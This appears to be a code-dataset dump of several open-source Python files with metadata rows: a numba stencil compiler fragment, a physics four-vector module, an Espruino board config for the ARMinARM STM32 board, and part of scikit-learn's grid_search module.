if not name in reserved_names:
new_var_dict[name] = ir_utils.mk_unique_var(name)
ir_utils.replace_var_names(stencil_ir.blocks, new_var_dict)
stencil_stub_last_label = max(stencil_ir.blocks.keys()) + 1
# Shift labels in the kernel copy so they are guaranteed unique
# and don't conflict with any labels in the stencil_ir.
kernel_copy.blocks = ir_utils.add_offset_to_labels(
kernel_copy.blocks, stencil_stub_last_label)
new_label = max(kernel_copy.blocks.keys()) + 1
# Adjust ret_blocks to account for addition of the offset.
ret_blocks = [x + stencil_stub_last_label for x in ret_blocks]
if config.DEBUG_ARRAY_OPT >= 1:
print("ret_blocks w/ offsets", ret_blocks, stencil_stub_last_label)
print("before replace sentinel stencil_ir")
ir_utils.dump_blocks(stencil_ir.blocks)
print("before replace sentinel kernel_copy")
ir_utils.dump_blocks(kernel_copy.blocks)
# Search all the block in the stencil outline for the sentinel.
for label, block in stencil_ir.blocks.items():
for i, inst in enumerate(block.body):
if (isinstance( inst, ir.Assign) and
inst.target.name == sentinel_name):
# We found the sentinel assignment.
loc = inst.loc
scope = block.scope
# split block across __sentinel__
# A new block is allocated for the statements prior to the
# sentinel but the new block maintains the current block
# label.
prev_block = ir.Block(scope, loc)
prev_block.body = block.body[:i]
# The current block is used for statements after sentinel.
block.body = block.body[i + 1:]
# But the current block gets a new label.
body_first_label = min(kernel_copy.blocks.keys())
# The previous block jumps to the minimum labelled block of
# the parfor body.
prev_block.append(ir.Jump(body_first_label, loc))
# Add all the parfor loop body blocks to the gufunc
# function's IR.
for (l, b) in kernel_copy.blocks.items():
stencil_ir.blocks[l] = b
stencil_ir.blocks[new_label] = block
stencil_ir.blocks[label] = prev_block
# Add a jump from all the blocks that previously contained
# a return in the stencil kernel to the block
# containing statements after the sentinel.
for ret_block in ret_blocks:
stencil_ir.blocks[ret_block].append(
ir.Jump(new_label, loc))
break
else:
continue
break
stencil_ir.blocks = ir_utils.rename_labels(stencil_ir.blocks)
ir_utils.remove_dels(stencil_ir.blocks)
assert(isinstance(the_array, types.Type))
array_types = args
new_stencil_param_types = list(array_types)
if config.DEBUG_ARRAY_OPT >= 1:
print("new_stencil_param_types", new_stencil_param_types)
ir_utils.dump_blocks(stencil_ir.blocks)
# Compile the combined stencil function with the replaced loop
# body in it.
ir_utils.fixup_var_define_in_scope(stencil_ir.blocks)
new_func = compiler.compile_ir(
self._typingctx,
self._targetctx,
stencil_ir,
new_stencil_param_types,
None,
compiler.DEFAULT_FLAGS,
{})
return new_func
def __call__(self, *args, **kwargs):
if (self.neighborhood is not None and
len(self.neighborhood) != args[0].ndim):
raise ValueError("{} dimensional neighborhood specified for {} "
"dimensional input array".format(
len(self.neighborhood), args[0].ndim))
if 'out' in kwargs:
result = kwargs['out']
rdtype = result.dtype
rttype = numpy_support.from_dtype(rdtype)
result_type = types.npytypes.Array(rttype, result.ndim,
numpy_support.map_layout(result))
array_types = tuple([typing.typeof.typeof(x) for x in args])
array_types_full = tuple([typing.typeof.typeof(x) for x in args] +
[result_type])
else:
result = None
array_types = tuple([typing.typeof.typeof(x) for x in args])
array_types_full = array_types
if config.DEBUG_ARRAY_OPT >= 1:
print("__call__", array_types, args, kwargs)
(real_ret, typemap, calltypes) = self.get_return_type(array_types)
new_func = self._stencil_wrapper(result, None, real_ret, typemap,
calltypes, *array_types_full)
if result is None:
return new_func.entry_point(*args)
else:
return new_func.entry_point(*(args+(result,)))
def stencil(func_or_mode='constant', **options):
# called on function without specifying mode style
if not isinstance(func_or_mode, str):
mode = 'constant' # default style
func = func_or_mode
else:
mode = func_or_mode
func = None
for option in options:
if option not in ["cval", "standard_indexing", "neighborhood"]:
raise ValueError("Unknown stencil option " + option)
wrapper = _stencil(mode, options)
if func is not None:
return wrapper(func)
return wrapper
def _stencil(mode, options):
if mode != 'constant':
raise ValueError("Unsupported mode style " + mode)
def decorated(func):
from numba.core import compiler
kernel_ir = compiler.run_frontend(func)
return StencilFunc(kernel_ir, mode, options)
return decorated
@lower_builtin(stencil)
def stencil_dummy_lower(context, builder, sig, args):
"lowering for dummy stencil calls"
return lir.Constant(lir.IntType(types.intp.bitwidth), 0)
| bsd-2-clause | -9,037,071,411,355,274,000 | 46.943558 | 141 | 0.532477 | false |
ajo2eq/DecaySim | vector.py | 1 | 9251 | from __future__ import division, print_function
from math import sqrt as _sqrt, atan2 as _atan2, log as _log, pi as _pi
#Force compatibility with python 2 and 3.
try:
xrange
except NameError:
xrange = range
class VecThree(object):
"""Simple three-vector implementation. Every method for retrieving or
setting a value is implemented for both momentum and position. The
methods are interchangeable."""
def __init__(self, x=0, y=0, z=0):
self._x = x
self._y = y
self._z = z
return
def P2(self):
"""Return the squared magnitude of momentum."""
return self._x**2 + self._y**2 + self._z**2
def P(self):
"""Return the magnitude of the momentum."""
return _sqrt(self._x**2 + self._y**2 + self._z**2)
def Pt(self):
"""Return the transverse momentum of the particle."""
return _sqrt(self._x**2 + self._y**2)
def X(self):
"""Return the x-component."""
return self._x
def Px(self):
"""Return the px-component."""
return self._x
def Y(self):
return self._y
def Py(self):
"""Return the py-component."""
return self._y
def Z(self):
"""Return the z-component."""
return self._z
def Pz(self):
"""Return the pz-component."""
return self._z
def SetX(self, x):
"""Set the x-component."""
self._x = x
def SetPx(self, x):
"""Set the x-component."""
self._x = x
def SetY(self, y):
"""Set the y-component."""
self._y = y
def SetPy(self, y):
"""Set the y-component."""
self._y = y
def SetZ(self, z):
"""Set the z-component."""
self._z = z
def SetPz(self, z):
"""Set the z-component."""
self._z = z
def Phi(self):
"""Return Phi of the particle."""
return _atan2(self._y, self._x)
def Eta(self):
"""Return pseudorapidity of the particle."""
p = _sqrt(self._x**2 + self._y**2 + self._z**2)
if (p == 0):
return 0.0
if (p == self._z and p > 0):
return 1e72
if (p == self._z and p < 0):
return -1e72
return 0.5*_log((p + self._z) / (p - self._z))
def DeltaPhi(self, v):
"""Return delta phi of it and some other particle."""
dPhi = self.Phi() - v.Phi()
if (dPhi >= _pi):
dPhi -= 2 * _pi
if (dPhi < -_pi):
dPhi += 2 * _pi
return dPhi
def DeltaEta(self, v):
"""Return delta eta of it and some other vector."""
return abs(self.Eta() - v.Eta())
def DeltaR(self, v):
"""Return delta eta of it and some other vector."""
return _sqrt(self.DeltaEta(v)**2 + self.DeltaPhi(v)**2)
def Dot3(self, v):
"""Return the dot product of it's and another vector's
positions/momenta."""
return (self.X() * v.X() + self.Y() * v.Y() + self.Z() * v.Z())
def Unit3(self):
"""Return a unit three-vector."""
mag = self.P()
return VecThree(self._x / mag,
self._y / mag,
self._z / mag)
def CosTheta(self, v):
"""Return the cosine of the angle between two vectors."""
return self.Unit3().Dot3(v.Unit3())
def __add__(self, v):
"""Return the vector sum."""
return VecThree(self.X() + v.X(), self.Y() + v.Y(), self.Z() + v.Z())
def __sub__(self, v):
"""Return the vector difference."""
return VecThree(self.X() - v.X(), self.Y() - v.Y(), self.Z() - v.Z())
def __mul__(self, v):
"""Multiply self by a scalar. This should not be used with a VecFour."""
return VecThree(self.X()*v, self.Y()*v, self.Z()*v)
def __truediv__(self, v):
"""Divide self by a scalar. This should mot be used with a VecFour."""
return VecThree(self.X()/v, self.Y()/v, self.Z()/v)
def __eq__(self, v):
"""Check equality of two vectors."""
if (self.X() == v.X() and
self.Y() == v.Y() and
self.Z() == v.Z()):
return True
return False
def __getitem__(self, key):
"""Allows acces to values via indexing."""
if (key == 0 or key == 'x' or key == 'px'):
return self.X()
if (key == 1 or key == 'y' or key == 'py'):
return self.Y()
if (key == 2 or key == 'z' or key == 'pz'):
return self.Z()
else:
raise AttributeError
def __repr__(self):
return '(%.4f, %.4f, %.4f)' % (self.X(), self.Y(), self.Z())
def __str__(self):
"""Represents vector as a string."""
return '(%.4f, %.4f, %.4f)' % (self.X(), self.Y(), self.Z())
def __imul__(self, scalar):
"""Return product of self and a scalar. This should not be used with
a VecFour."""
self.SetX(self.X() * scalar)
self.SetY(self.Y() * scalar)
self.SetZ(self.Z() * scalar)
return self
def __iadd__(self, v):
"""Adds another vector to self."""
self.SetX(self.X() + v.X())
self.SetY(self.Y() + v.Y())
self.SetZ(self.Z() + v.Z())
def __neg__(self):
"""Flip sign of spcial/momentum components."""
self.SetX(self.X() * -1.)
self.SetY(self.Y() * -1.)
self.SetZ(self.Z() * -1.)
def Generator(self):
for i in xrange(3):
yield self[i]
class VecFour(VecThree):
"""Simple four-vector implementation. Every method for retrieving or
setting a value is implemented for both momentum and position. The
methods are interchangeable."""
def __init__(self, x=0, y=0, z=0, t=0):
super(VecFour, self).__init__(x, y, z)
self._t = t
return
def T(self):
"""Return the t-component."""
return self._t
def E(self):
"""Return the e-component."""
return self._t
def M2(self):
"""Return E^2 - P^2."""
return self.T()**2 - (self.X()**2 + self.Y()**2 + self.Z()**2)
def SetT(self, t):
"""Set the t-component."""
self._t = t
def SetE(self, e):
"""Set the e-component."""
self._t = e
def Dot4(self, v):
"""Return E1*E2 - P1*P2."""
return self.T() * v.T() - self.Dot3(v)
def Unit4(self):
"""Return a unit four-vector."""
mag = _sqrt(self._x**2 + self._y**2 + self._z**2 + self._t**2)
return VecFour(self._x / mag,
self._y / mag,
self._z / mag,
self._t / mag)
def BoostVector(self):
"""Return a three-vector conaining Beta-x, Beta-y, and Beta-z."""
bx = self._x / self._t
by = self._y / self._t
bz = self._z / self._t
return VecThree(bx, by, bz)
def Boost(self, v):
"""Boost the vector to the rest-frame of some other vector. It accepts
a VecThree of the components of beta."""
bx = v.X()
by = v.Y()
bz = v.Z()
b2 = bx**2 + by**2 + bz**2
g = 1. / _sqrt(1. - b2)
bp = self.Dot3(v)
if (b2 > 0):
g2 = (g - 1.)/b2
else:
g2 = 0.
self.SetX(self.X() + g2*bp*bx + g*bx*self.T())
self.SetY(self.Y() + g2*bp*by + g*by*self.T())
self.SetZ(self.Z() + g2*bp*bz + g*bz*self.T())
self.SetT(g*(self.T() + bp))
return
def __add__(self, v):
"""Return the vector sum."""
return VecFour(self.X() + v.X(), self.Y() + v.Y(),
self.Z() + v.Z(), self.T() + v.T())
def __sub__(self, v):
"""Return the difference of the vectors' components."""
return VecThree(self.X() - v.X(), self.Y() - v.Y(), self.Z() - v.Z())
def __eq__(self, v):
"""Check equality of two vectors."""
if (self.X() == v.X() and
self.Y() == v.Y() and
self.Z() == v.Z() and
self.T() == v.T()):
return True
return False
def __getitem__(self, key):
if (key == 0 or key == 'x' or key == 'px'):
return self.X()
if (key == 1 or key == 'y' or key == 'py'):
return self.Y()
if (key == 2 or key == 'z' or key == 'pz'):
return self.Z()
if (key == 3 or key == 't' or key == 'e'):
return self.T()
else:
raise AttributeError
def __repr__(self):
return '(%.4f, %.4f, %.4f, %.4f)' % (self.X(), self.Y(),
self.Z(), self.T())
def __str__(self):
"""Represents vector as a string."""
return '(%.4f, %.4f, %.4f, %.4f)' % (self.X(), self.Y(),
self.Z(), self.T())
def __iadd__(self, v):
"""Adds another vector to self."""
self.SetX(self.X() + v.X())
self.SetY(self.Y() + v.Y())
self.SetZ(self.Z() + v.Z())
self.SetT(self.T() + v.T())
def Generator(self):
for i in xrange(4):
yield self[i]
| mit | -3,950,602,815,593,994,000 | 24.626039 | 80 | 0.467841 | false |
plumbum/Espruino | boards/ARMINARM.py | 10 | 1909 | #!/bin/false
# This file is part of Espruino, a JavaScript interpreter for Microcontrollers
#
# Copyright (C) 2013 Gordon Williams <[email protected]>
# Adapted for ARMinARM board by Rik Teerling <[email protected]>
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
# ----------------------------------------------------------------------------------------
# This file contains information for a specific board - the available pins, and where LEDs,
# Buttons, and other in-built peripherals are. It is used to build documentation as well
# as various source and header files for Espruino.
# ----------------------------------------------------------------------------------------
import pinutils;
info = {
'name' : "ARMinARM addon board for Raspberry Pi B+",
'link' : [ "https://www.onandoffables.com/" ],
'variables' : 3250,
'binary_name' : 'espruino_%v_ARMinARM.bin',
};
chip = {
'part' : "STM32F103RET6",
'family' : "STM32F1",
'package' : "LQFP64",
'ram' : 64,
'flash' : 512,
'speed' : 72,
'usart' : 5,
'spi' : 3,
'i2c' : 2,
'adc' : 3,
'dac' : 2,
};
devices = {
'OSC' : { 'pin_in' : 'D0',
'pin_out' : 'D1' },
'OSC_RTC' : { 'pin_in' : 'C14',
'pin_out' : 'C15' },
'LED1' : { 'pin' : 'B0' },
'BTN1' : { 'pin' : 'A0' },
'USB' : { 'pin_disc' : 'C13',
'pin_dm' : 'A11',
'pin_dp' : 'A12' },
'SD' : { 'pin_cs' : 'D2',
'pin_di' : 'B15',
'pin_do' : 'B14',
'pin_clk' : 'B13' },
# 'BLUETOOTH' : { 'pin_tx' : 'A9',
# 'pin_rx' : 'A10' },
};
def get_pins():
pins = pinutils.scan_pin_file([], 'stm32f103xe.csv', 6, 10, 11)
return pinutils.only_from_package(pinutils.fill_gaps_in_pin_list(pins), chip["package"])
| mpl-2.0 | 6,897,063,170,603,100,000 | 32.491228 | 91 | 0.513882 | false |
ClimbsRocks/scikit-learn | sklearn/grid_search.py | 2 | 38534 | """
The :mod:`sklearn.grid_search` includes utilities to fine-tune the parameters
of an estimator.
"""
from __future__ import print_function
# Author: Alexandre Gramfort <[email protected]>,
# Gael Varoquaux <[email protected]>
# Andreas Mueller <[email protected]>
# Olivier Grisel <[email protected]>
# License: BSD 3 clause
from abc import ABCMeta, abstractmethod
from collections import Mapping, namedtuple, Sized
from functools import partial, reduce
from itertools import product
import operator
import warnings
import numpy as np
from .base import BaseEstimator, is_classifier, clone
from .base import MetaEstimatorMixin
from .cross_validation import check_cv
from .cross_validation import _fit_and_score
from .externals.joblib import Parallel, delayed
from .externals import six
from .utils import check_random_state
from .utils.random import sample_without_replacement
from .utils.validation import _num_samples, indexable
from .utils.metaestimators import if_delegate_has_method
from .metrics.scorer import check_scoring
from .exceptions import ChangedBehaviorWarning
__all__ = ['GridSearchCV', 'ParameterGrid', 'fit_grid_point',
'ParameterSampler', 'RandomizedSearchCV']
warnings.warn("This module was deprecated in version 0.18 in favor of the "
"model_selection module into which all the refactored classes "
"and functions are moved. This module will be removed in 0.20.",
DeprecationWarning)
class ParameterGrid(object):
"""Grid of parameters with a discrete number of values for each.
Can be used to iterate over parameter value combinations with the
Python built-in function iter.
Read more in the :ref:`User Guide <grid_search>`.
Parameters
----------
param_grid : dict of string to sequence, or sequence of such
The parameter grid to explore, as a dictionary mapping estimator
parameters to sequences of allowed values.
An empty dict signifies default parameters.
A sequence of dicts signifies a sequence of grids to search, and is
useful to avoid exploring parameter combinations that make no sense
or have no effect. See the examples below.
Examples
--------
>>> from sklearn.grid_search import ParameterGrid
>>> param_grid = {'a': [1, 2], 'b': [True, False]}
>>> list(ParameterGrid(param_grid)) == (
... [{'a': 1, 'b': True}, {'a': 1, 'b': False},
... {'a': 2, 'b': True}, {'a': 2, 'b': False}])
True
>>> grid = [{'kernel': ['linear']}, {'kernel': ['rbf'], 'gamma': [1, 10]}]
>>> list(ParameterGrid(grid)) == [{'kernel': 'linear'},
... {'kernel': 'rbf', 'gamma': 1},
... {'kernel': 'rbf', 'gamma': 10}]
True
>>> ParameterGrid(grid)[1] == {'kernel': 'rbf', 'gamma': 1}
True
See also
--------
:class:`GridSearchCV`:
uses ``ParameterGrid`` to perform a full parallelized parameter search.
"""
def __init__(self, param_grid):
if isinstance(param_grid, Mapping):
# wrap dictionary in a singleton list to support either dict
# or list of dicts
param_grid = [param_grid]
self.param_grid = param_grid
def __iter__(self):
"""Iterate over the points in the grid.
Returns
-------
params : iterator over dict of string to any
Yields dictionaries mapping each estimator parameter to one of its
allowed values.
"""
for p in self.param_grid:
# Always sort the keys of a dictionary, for reproducibility
items = sorted(p.items())
if not items:
yield {}
else:
keys, values = zip(*items)
for v in product(*values):
params = dict(zip(keys, v))
yield params
def __len__(self):
"""Number of points on the grid."""
# Product function that can handle iterables (np.product can't).
product = partial(reduce, operator.mul)
return sum(product(len(v) for v in p.values()) if p else 1
for p in self.param_grid)
def __getitem__(self, ind):
"""Get the parameters that would be ``ind``th in iteration
Parameters
----------
ind : int
The iteration index
Returns
-------
params : dict of string to any
Equal to list(self)[ind]
"""
# This is used to make discrete sampling without replacement memory
# efficient.
for sub_grid in self.param_grid:
# XXX: could memoize information used here
if not sub_grid:
if ind == 0:
return {}
else:
ind -= 1
continue
# Reverse so most frequent cycling parameter comes first
keys, values_lists = zip(*sorted(sub_grid.items())[::-1])
sizes = [len(v_list) for v_list in values_lists]
total = np.product(sizes)
if ind >= total:
# Try the next grid
ind -= total
else:
out = {}
for key, v_list, n in zip(keys, values_lists, sizes):
ind, offset = divmod(ind, n)
out[key] = v_list[offset]
return out
raise IndexError('ParameterGrid index out of range')
class ParameterSampler(object):
"""Generator on parameters sampled from given distributions.
Non-deterministic iterable over random candidate combinations for hyper-
parameter search. If all parameters are presented as a list,
sampling without replacement is performed. If at least one parameter
is given as a distribution, sampling with replacement is used.
It is highly recommended to use continuous distributions for continuous
parameters.
Note that as of SciPy 0.12, the ``scipy.stats.distributions`` do not accept
a custom RNG instance and always use the singleton RNG from
``numpy.random``. Hence setting ``random_state`` will not guarantee a
deterministic iteration whenever ``scipy.stats`` distributions are used to
define the parameter search space.
Read more in the :ref:`User Guide <grid_search>`.
Parameters
----------
param_distributions : dict
Dictionary where the keys are parameters and values
are distributions from which a parameter is to be sampled.
Distributions either have to provide a ``rvs`` function
to sample from them, or can be given as a list of values,
where a uniform distribution is assumed.
n_iter : integer
Number of parameter settings that are produced.
random_state : int or RandomState
Pseudo random number generator state used for random uniform sampling
from lists of possible values instead of scipy.stats distributions.
Returns
-------
params : dict of string to any
**Yields** dictionaries mapping each estimator parameter to
as sampled value.
Examples
--------
>>> from sklearn.grid_search import ParameterSampler
>>> from scipy.stats.distributions import expon
>>> import numpy as np
>>> np.random.seed(0)
>>> param_grid = {'a':[1, 2], 'b': expon()}
>>> param_list = list(ParameterSampler(param_grid, n_iter=4))
>>> rounded_list = [dict((k, round(v, 6)) for (k, v) in d.items())
... for d in param_list]
>>> rounded_list == [{'b': 0.89856, 'a': 1},
... {'b': 0.923223, 'a': 1},
... {'b': 1.878964, 'a': 2},
... {'b': 1.038159, 'a': 2}]
True
"""
def __init__(self, param_distributions, n_iter, random_state=None):
self.param_distributions = param_distributions
self.n_iter = n_iter
self.random_state = random_state
def __iter__(self):
# check if all distributions are given as lists
# in this case we want to sample without replacement
all_lists = np.all([not hasattr(v, "rvs")
for v in self.param_distributions.values()])
rnd = check_random_state(self.random_state)
if all_lists:
# look up sampled parameter settings in parameter grid
param_grid = ParameterGrid(self.param_distributions)
grid_size = len(param_grid)
if grid_size < self.n_iter:
raise ValueError(
"The total space of parameters %d is smaller "
"than n_iter=%d." % (grid_size, self.n_iter)
+ " For exhaustive searches, use GridSearchCV.")
for i in sample_without_replacement(grid_size, self.n_iter,
random_state=rnd):
yield param_grid[i]
else:
# Always sort the keys of a dictionary, for reproducibility
items = sorted(self.param_distributions.items())
for _ in six.moves.range(self.n_iter):
params = dict()
for k, v in items:
if hasattr(v, "rvs"):
params[k] = v.rvs()
else:
params[k] = v[rnd.randint(len(v))]
yield params
def __len__(self):
"""Number of points that will be sampled."""
return self.n_iter
def fit_grid_point(X, y, estimator, parameters, train, test, scorer,
verbose, error_score='raise', **fit_params):
"""Run fit on one set of parameters.
Parameters
----------
X : array-like, sparse matrix or list
Input data.
y : array-like or None
Targets for input data.
estimator : estimator object
A object of that type is instantiated for each grid point.
This is assumed to implement the scikit-learn estimator interface.
Either estimator needs to provide a ``score`` function,
or ``scoring`` must be passed.
parameters : dict
Parameters to be set on estimator for this grid point.
train : ndarray, dtype int or bool
Boolean mask or indices for training set.
test : ndarray, dtype int or bool
Boolean mask or indices for test set.
scorer : callable or None.
If provided must be a scorer callable object / function with signature
``scorer(estimator, X, y)``.
verbose : int
Verbosity level.
**fit_params : kwargs
Additional parameter passed to the fit function of the estimator.
error_score : 'raise' (default) or numeric
Value to assign to the score if an error occurs in estimator fitting.
If set to 'raise', the error is raised. If a numeric value is given,
FitFailedWarning is raised. This parameter does not affect the refit
step, which will always raise the error.
Returns
-------
score : float
Score of this parameter setting on given training / test split.
parameters : dict
The parameters that have been evaluated.
n_samples_test : int
Number of test samples in this split.
"""
score, n_samples_test, _ = _fit_and_score(estimator, X, y, scorer, train,
test, verbose, parameters,
fit_params, error_score)
return score, parameters, n_samples_test
def _check_param_grid(param_grid):
if hasattr(param_grid, 'items'):
param_grid = [param_grid]
for p in param_grid:
for v in p.values():
if isinstance(v, np.ndarray) and v.ndim > 1:
raise ValueError("Parameter array should be one-dimensional.")
check = [isinstance(v, k) for k in (list, tuple, np.ndarray)]
if True not in check:
raise ValueError("Parameter values should be a list.")
if len(v) == 0:
raise ValueError("Parameter values should be a non-empty "
"list.")
class _CVScoreTuple (namedtuple('_CVScoreTuple',
('parameters',
'mean_validation_score',
'cv_validation_scores'))):
# A raw namedtuple is very memory efficient as it packs the attributes
# in a struct to get rid of the __dict__ of attributes in particular it
# does not copy the string for the keys on each instance.
# By deriving a namedtuple class just to introduce the __repr__ method we
# would also reintroduce the __dict__ on the instance. By telling the
# Python interpreter that this subclass uses static __slots__ instead of
# dynamic attributes. Furthermore we don't need any additional slot in the
# subclass so we set __slots__ to the empty tuple.
__slots__ = ()
def __repr__(self):
"""Simple custom repr to summarize the main info"""
return "mean: {0:.5f}, std: {1:.5f}, params: {2}".format(
self.mean_validation_score,
np.std(self.cv_validation_scores),
self.parameters)
class BaseSearchCV(six.with_metaclass(ABCMeta, BaseEstimator,
MetaEstimatorMixin)):
"""Base class for hyper parameter search with cross-validation."""
@abstractmethod
def __init__(self, estimator, scoring=None,
fit_params=None, n_jobs=1, iid=True,
refit=True, cv=None, verbose=0, pre_dispatch='2*n_jobs',
error_score='raise'):
self.scoring = scoring
self.estimator = estimator
self.n_jobs = n_jobs
self.fit_params = fit_params if fit_params is not None else {}
self.iid = iid
self.refit = refit
self.cv = cv
self.verbose = verbose
self.pre_dispatch = pre_dispatch
self.error_score = error_score
@property
def _estimator_type(self):
return self.estimator._estimator_type
def score(self, X, y=None):
"""Returns the score on the given data, if the estimator has been refit.
This uses the score defined by ``scoring`` where provided, and the
``best_estimator_.score`` method otherwise.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Input data, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape = [n_samples] or [n_samples, n_output], optional
Target relative to X for classification or regression;
None for unsupervised learning.
Returns
-------
score : float
Notes
-----
* The long-standing behavior of this method changed in version 0.16.
* It no longer uses the metric provided by ``estimator.score`` if the
``scoring`` parameter was set when fitting.
"""
if self.scorer_ is None:
raise ValueError("No score function explicitly defined, "
"and the estimator doesn't provide one %s"
% self.best_estimator_)
if self.scoring is not None and hasattr(self.best_estimator_, 'score'):
warnings.warn("The long-standing behavior to use the estimator's "
"score function in {0}.score has changed. The "
"scoring parameter is now used."
"".format(self.__class__.__name__),
ChangedBehaviorWarning)
return self.scorer_(self.best_estimator_, X, y)
@if_delegate_has_method(delegate='estimator')
def predict(self, X):
"""Call predict on the estimator with the best found parameters.
Only available if ``refit=True`` and the underlying estimator supports
``predict``.
Parameters
-----------
X : indexable, length n_samples
Must fulfill the input assumptions of the
underlying estimator.
"""
return self.best_estimator_.predict(X)
@if_delegate_has_method(delegate='estimator')
def predict_proba(self, X):
"""Call predict_proba on the estimator with the best found parameters.
Only available if ``refit=True`` and the underlying estimator supports
``predict_proba``.
Parameters
-----------
X : indexable, length n_samples
Must fulfill the input assumptions of the
underlying estimator.
"""
return self.best_estimator_.predict_proba(X)
@if_delegate_has_method(delegate='estimator')
def predict_log_proba(self, X):
"""Call predict_log_proba on the estimator with the best found parameters.
Only available if ``refit=True`` and the underlying estimator supports
``predict_log_proba``.
Parameters
-----------
X : indexable, length n_samples
Must fulfill the input assumptions of the
underlying estimator.
"""
return self.best_estimator_.predict_log_proba(X)
@if_delegate_has_method(delegate='estimator')
def decision_function(self, X):
"""Call decision_function on the estimator with the best found parameters.
Only available if ``refit=True`` and the underlying estimator supports
``decision_function``.
Parameters
-----------
X : indexable, length n_samples
Must fulfill the input assumptions of the
underlying estimator.
"""
return self.best_estimator_.decision_function(X)
@if_delegate_has_method(delegate='estimator')
def transform(self, X):
"""Call transform on the estimator with the best found parameters.
Only available if the underlying estimator supports ``transform`` and
``refit=True``.
Parameters
-----------
X : indexable, length n_samples
Must fulfill the input assumptions of the
underlying estimator.
"""
return self.best_estimator_.transform(X)
@if_delegate_has_method(delegate='estimator')
def inverse_transform(self, Xt):
"""Call inverse_transform on the estimator with the best found parameters.
Only available if the underlying estimator implements ``inverse_transform`` and
``refit=True``.
Parameters
-----------
Xt : indexable, length n_samples
Must fulfill the input assumptions of the
underlying estimator.
"""
return self.best_estimator_.transform(Xt)
def _fit(self, X, y, parameter_iterable):
"""Actual fitting, performing the search over parameters."""
estimator = self.estimator
cv = self.cv
self.scorer_ = check_scoring(self.estimator, scoring=self.scoring)
n_samples = _num_samples(X)
X, y = indexable(X, y)
if y is not None:
if len(y) != n_samples:
raise ValueError('Target variable (y) has a different number '
'of samples (%i) than data (X: %i samples)'
% (len(y), n_samples))
cv = check_cv(cv, X, y, classifier=is_classifier(estimator))
if self.verbose > 0:
if isinstance(parameter_iterable, Sized):
n_candidates = len(parameter_iterable)
print("Fitting {0} folds for each of {1} candidates, totalling"
" {2} fits".format(len(cv), n_candidates,
n_candidates * len(cv)))
base_estimator = clone(self.estimator)
pre_dispatch = self.pre_dispatch
out = Parallel(
n_jobs=self.n_jobs, verbose=self.verbose,
pre_dispatch=pre_dispatch
)(
delayed(_fit_and_score)(clone(base_estimator), X, y, self.scorer_,
train, test, self.verbose, parameters,
self.fit_params, return_parameters=True,
error_score=self.error_score)
for parameters in parameter_iterable
for train, test in cv)
# Out is a list of triplet: score, estimator, n_test_samples
n_fits = len(out)
n_folds = len(cv)
scores = list()
grid_scores = list()
for grid_start in range(0, n_fits, n_folds):
n_test_samples = 0
score = 0
all_scores = []
for this_score, this_n_test_samples, _, parameters in \
out[grid_start:grid_start + n_folds]:
all_scores.append(this_score)
if self.iid:
this_score *= this_n_test_samples
n_test_samples += this_n_test_samples
score += this_score
if self.iid:
score /= float(n_test_samples)
else:
score /= float(n_folds)
scores.append((score, parameters))
# TODO: shall we also store the test_fold_sizes?
grid_scores.append(_CVScoreTuple(
parameters,
score,
np.array(all_scores)))
# Store the computed scores
self.grid_scores_ = grid_scores
# Find the best parameters by comparing on the mean validation score:
# note that `sorted` is deterministic in the way it breaks ties
best = sorted(grid_scores, key=lambda x: x.mean_validation_score,
reverse=True)[0]
self.best_params_ = best.parameters
self.best_score_ = best.mean_validation_score
if self.refit:
# fit the best estimator using the entire dataset
# clone first to work around broken estimators
best_estimator = clone(base_estimator).set_params(
**best.parameters)
if y is not None:
best_estimator.fit(X, y, **self.fit_params)
else:
best_estimator.fit(X, **self.fit_params)
self.best_estimator_ = best_estimator
return self
class GridSearchCV(BaseSearchCV):
"""Exhaustive search over specified parameter values for an estimator.
Important members are fit, predict.
GridSearchCV implements a "fit" and a "score" method.
It also implements "predict", "predict_proba", "decision_function",
"transform" and "inverse_transform" if they are implemented in the
estimator used.
The parameters of the estimator used to apply these methods are optimized
by cross-validated grid-search over a parameter grid.
Read more in the :ref:`User Guide <grid_search>`.
Parameters
----------
estimator : estimator object.
A object of that type is instantiated for each grid point.
This is assumed to implement the scikit-learn estimator interface.
Either estimator needs to provide a ``score`` function,
or ``scoring`` must be passed.
param_grid : dict or list of dictionaries
Dictionary with parameters names (string) as keys and lists of
parameter settings to try as values, or a list of such
dictionaries, in which case the grids spanned by each dictionary
in the list are explored. This enables searching over any sequence
of parameter settings.
scoring : string, callable or None, default=None
A string (see model evaluation documentation) or
a scorer callable object / function with signature
``scorer(estimator, X, y)``.
If ``None``, the ``score`` method of the estimator is used.
fit_params : dict, optional
Parameters to pass to the fit method.
n_jobs : int, default=1
Number of jobs to run in parallel.
.. versionchanged:: 0.17
Upgraded to joblib 0.9.3.
pre_dispatch : int, or string, optional
Controls the number of jobs that get dispatched during parallel
execution. Reducing this number can be useful to avoid an
explosion of memory consumption when more jobs get dispatched
than CPUs can process. This parameter can be:
- None, in which case all the jobs are immediately
created and spawned. Use this for lightweight and
fast-running jobs, to avoid delays due to on-demand
spawning of the jobs
- An int, giving the exact number of total jobs that are
spawned
- A string, giving an expression as a function of n_jobs,
as in '2*n_jobs'
iid : boolean, default=True
If True, the data is assumed to be identically distributed across
the folds, and the loss minimized is the total loss per sample,
and not the mean loss across the folds.
cv : int, cross-validation generator or an iterable, optional
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- An object to be used as a cross-validation generator.
- An iterable yielding train/test splits.
For integer/None inputs, if the estimator is a classifier and ``y`` is
either binary or multiclass,
:class:`sklearn.model_selection.StratifiedKFold` is used. In all
other cases, :class:`sklearn.model_selection.KFold` is used.
Refer :ref:`User Guide <cross_validation>` for the various
cross-validation strategies that can be used here.
refit : boolean, default=True
Refit the best estimator with the entire dataset.
If "False", it is impossible to make predictions using
this GridSearchCV instance after fitting.
verbose : integer
Controls the verbosity: the higher, the more messages.
error_score : 'raise' (default) or numeric
Value to assign to the score if an error occurs in estimator fitting.
If set to 'raise', the error is raised. If a numeric value is given,
FitFailedWarning is raised. This parameter does not affect the refit
step, which will always raise the error.
Examples
--------
>>> from sklearn import svm, grid_search, datasets
>>> iris = datasets.load_iris()
>>> parameters = {'kernel':('linear', 'rbf'), 'C':[1, 10]}
>>> svr = svm.SVC()
>>> clf = grid_search.GridSearchCV(svr, parameters)
